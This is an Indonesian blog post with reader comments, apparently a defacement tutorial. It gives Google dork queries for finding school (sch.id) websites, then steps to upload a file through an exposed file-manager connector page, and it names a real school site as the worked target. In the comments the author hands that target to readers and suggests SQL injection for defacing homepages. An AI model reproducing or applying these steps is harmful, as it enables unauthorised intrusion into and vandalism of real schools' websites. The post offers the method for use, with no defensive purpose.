Cara Mudah Deface Situs sch.id. Sebenarnya ini cara yang lumayan lama. Namun karena mentok nggak ada bahan postingan, iseng-iseng tadi nambah list deface di indonesiandefacer.org pake cara ini. Mau pake SQLi, males. Kadang discan pake Havij udah nemu password sama usernya malah halaman buat loginnya gak ketemu.
Yaudah, pake cara ini saja. cara ini bisa dibilang cara yang paling mudah karena kita tidak perlu masuk lewat pintu depan/admin. Dan sekalian mau share di blog.
Alat
Google dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
File dengan format txt :
Terserah mau diisi apa. Boleh diisi puisi, misuh-misuh (jangan ding !), atau nomer hape (ini sih orang lebay) . pokoknya terserah deh !!!
langkah-langkah :
1. Masukkan dork diatas di kotak pencarian google.
2. Pilih salah satu situs yang muncul. disini saya ambil contoh : http://www.sman1gombong.sch.id/html/alumni.php
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
4. Pada opsi connector, pilih PHP. lalu upload file txt milik kamu.
5. Untuk membuka hasilnya, exploitnya adalah http://site.sch.id/userfiles/file/namafile.txt . Jadi untuk contoh saya menjadi http://www.sman1gombong.sch.id/userfiles/file/Wonderk-ID.txt
Selesai !!
Mudah kan ???
Sekian tutorial kali ini. Semoga bermanfaat.
wahyu di says
wah mantab Gan. bungkus dulu ia Gan, mau praktek dah malem bngt. besok langsung praktek Gan.
makasih ilmunya met mlm Gan 🙂
chiaki says
Iya. Hehehe
Xi Game says
menarik sekali tapi ane gak ikutan gan 😀
chiaki says
Iya. Hehehe
Masnady says
oh gitu to caranya…? terimakasih sobat atas penjelasan dan tutorialnya…?
sayang nih saya pake hp, sedikit kerepotan kalau mau praktek wkwkwkwkwkwkwkw
chiaki says
Oke sob. Hehehe
budi os 19 says
Hehe…ga ngerti…nih yud…fungsi nya buat apaan ya… 🙂
Payah ya saya… 😀
chiaki says
Buat yang bener2 cupu pengen belajar defacing. Hehehe
deby putra bahrodin says
dosa mas dosa … nanti di cari sama pak kapolri loh .. hehehe ..
itu cara yang simple tapi apakah 100% work mas?
chiaki says
Ini gk ngerusak database . Cuma upload file. Tingkat keberhasilan 95% . :p
Muro'i El-Barezy says
WOKEH MUDAH BANGET SOB, trims pisan sharingnya happy blogging sob
chiaki says
Sama-sama
wahyu di says
hehehehhe singgah lagi nie Gan, makasih atas usulnya Gan….!!
kalo ada waktu bole di coba lg,vrivikasi katanya masih pa gak,heee???
met pagi,sukses selalu Gan….!!
chiaki says
Iya sob. Hehehe
cik awi says
Walah saya malah baru tau tentang hal ini sobat… Maklum ketinggalan kereta… Dan perlu registrasi dulu atau kagak itu sob?
chiaki says
Nggak perlu sob. . . Lewat upload. Hehehe
Brebes VS Lamongan says
met siang mas waduh mancap,ni mas trmksih banyak mas dah berbagi
chiaki says
Oke sob. . .
inblogspot.com says
Wah keren gan bisa deface web sekolahan..
chiaki says
Hehehe. . Maklum, newbie. :p
Achmad Muharya says
kalo ke homepage masih bisa masuk tuh mas o.O
maklumlah masih belum terlalu mengerti samahal ini…
chiaki says
Kalo mau mepes home nya pake sql injection masbro. 😀
Masnady says
datang lagi sobat untuk menginformasikan bahwa link sobat sudah saya kibarkan di blog saya.
saya harap sobat juga bersedia mengibarkan link blog saya di sini.
semoga persahabatan kita makin erat sob…..
chiaki says
Oke sudah. Hehehe
Bung Penho says
masih bingung!. ini sebenarnya buat apa'an ya?
chiaki says
Buat latian deface bung. 😀
OkkyGeorgeous says
GAn mau tanya ??
Google dork itu apa dan fungsinya apa?
secara simple aja baca di google malah mumet!!
Anonim says
maksudnya 'ganti url jadi editor' tuh apa ?
suminar apriyanto says
minta target sob.
Was not found on this server terus sob.
chiaki says
Pake target saya diatas.
mas ihsan says
kalau pake hp bisa gak cak
chiaki says
bisa brooo. :v
Anonim says
Kurang Jelas Tuh Toritorialnya .. Yang no 3 saya gk jelas
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
Hawari Aliansyah says
udh gk bisa ya?
Jasa Outbound di Malang says
Saya senang sekali menemukan postingan anda dan bisa ikut memberi komentar menurut saya sangat berharga sekali bisa membaca tulisan anda, dan pada kesempatan ini akan saya manfaatkan untuk sumber referensi saya
Terima kasih banyak telah berbagi, saya berharap anda terus semangat menulis topik selanjutnya
Paket Outbound Malang
Tempat Outbound Mojokerto
Tempat Outbound Pasuruan
Paket Outbound Kediri
SEBAT GAMING says
tolong bantu ms( itu gmana ya yg pilih PHP nya?
SEBAT GAMING says
tolong bantu ms( itu gmana ya yg pilih PHP nya?